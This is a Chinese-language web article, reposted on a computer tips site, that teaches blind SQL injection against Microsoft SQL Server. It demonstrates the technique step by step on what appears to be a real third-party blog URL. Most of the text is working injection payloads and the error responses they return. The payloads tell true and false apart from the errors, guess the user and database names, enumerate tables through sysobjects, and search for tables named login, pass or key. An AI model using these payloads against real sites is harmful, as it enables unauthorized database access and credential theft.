首页 电脑 电脑学堂 查看内容

灵活地运用SQL Injection做数据库渗透

2005-6-12 04:03 722 0

摘要: 如何灵活地运用SQL Injection做数据库渗透的一种思路如今,很多关于mssql数据库的渗透技巧已不能有效地获取有用的数据值。比如在一个怀疑是注入点的地方 www.xxxxx.com/blog....
关键词: sysobjects name select xtype where geoipcountrywhoi Server user 语句 top

如何灵活地运用SQL Injection做数据库渗透的一种思路如今,很多关于mssql数据库的渗透技巧已不能有效地获取有用的数据值。比如在一个怀疑是注入点的地方 www.xxxxx.com/blog.asp?id=4当加入" ' "符号进行注入测试时,www.xxxxx.com/blog.asp?id=4'出错信息是,[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '4? to a column of data type int我们知道它不对" ' "符号进行过滤。再用如下语句测试,http://www.aquavelvas.com/blog.asp?id=4 and 1=1出错信息是,[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '4 and 1=1' to a column of data type int好,再来继续测试,http://www.aquavelvas.com/blog.asp?id=4'%20and%20'1'='1这次出错讯息不同了,如下[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ' and '我们的" ' "符号加对了,再继续测试,http://www.aquavelvas.com/blog.asp?id=4'%20and%20user>'0出错信息如下,[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ' and user>'应该是语法不允许直接回值,是不是不能再继续了呢?想想其他办法,就看user值的长度吧,http://www.aquavelvas.com/blog.asp?id=4'%20and%20len(user)>'0出错信息是,[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ' and len(user)>'好,我们知道如果出错信息是Syntax error...或Either BOF or EOF is True...的话,那语句在逻辑上是错的;而如果出错信息是Incorrect syntax...的话,那语句在逻辑上就是对的。当处理len(user)>0,凭着刚才的想法,我们知道在逻辑上这是对的。我们试试逻辑上错的语句,http://www.aquavelvas.com/blog.asp?id=4'%20and%20user%20'1'='2果然,出错信息是,Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record从len(user)>0这语法的基础上,我们得知user的长度是7,之后再用left(user,1)=a这语法来猜出user名是thomasa。再用db_name()这个function,我们可猜出数据库名。好了,如何猜表名呢?就先猜表名的长度吧,就用如下语句,len(select top 1 name from sysobjects where xtype='U')>10len(select top 1 name from sysobjects where xtype='U')>9len(select top 1 name from sysobjects where xtype='U')>8...(猜表名的工作是很烦人,建议用perl写个script来玩玩)再猜表名,left((select top 1 name from sysobjects where xtype='U'),1)=aleft((select top 1 name from sysobjects where xtype='U'),2)=ableft((select top 1 name from sysobjects where xtype='U'),3)=abc...好了,我们知道第一个表名是'geoipcountrywhois' (知道为什么我建议写个perl script吧!)再继续猜表名,len(select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')>10len(select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')>9len(select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')>8...left((select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')),1)=bleft((select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')),1)=lleft((select top 1 name from sysobjects where xtype='U' and name not in ('geoipcountrywhois')),1)=o....好第二个表名是blog,之后的表名可用('geoipcountrywhois','blog')来继续猜,然而,这显然不是好办法。为什么我们不进行搜索呢?如何搜索呢?就用如下的语句吧,(select count(*) from sysobjects where xtype='U' and name like '%login%')=0(select count(*) from sysobjects where xtype='U' and name like '%pass%')=0(select count(*) from sysobjects where xtype='U' and name like '%key%')=0(记得将" % "这符号换成" %25 "才是正确的输入)好了,通过逻辑上对或错的判断,我们也可以对数据库进行渗透,不再局限于回弹显示值。希望这思路能开阔注入技术的演变。
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部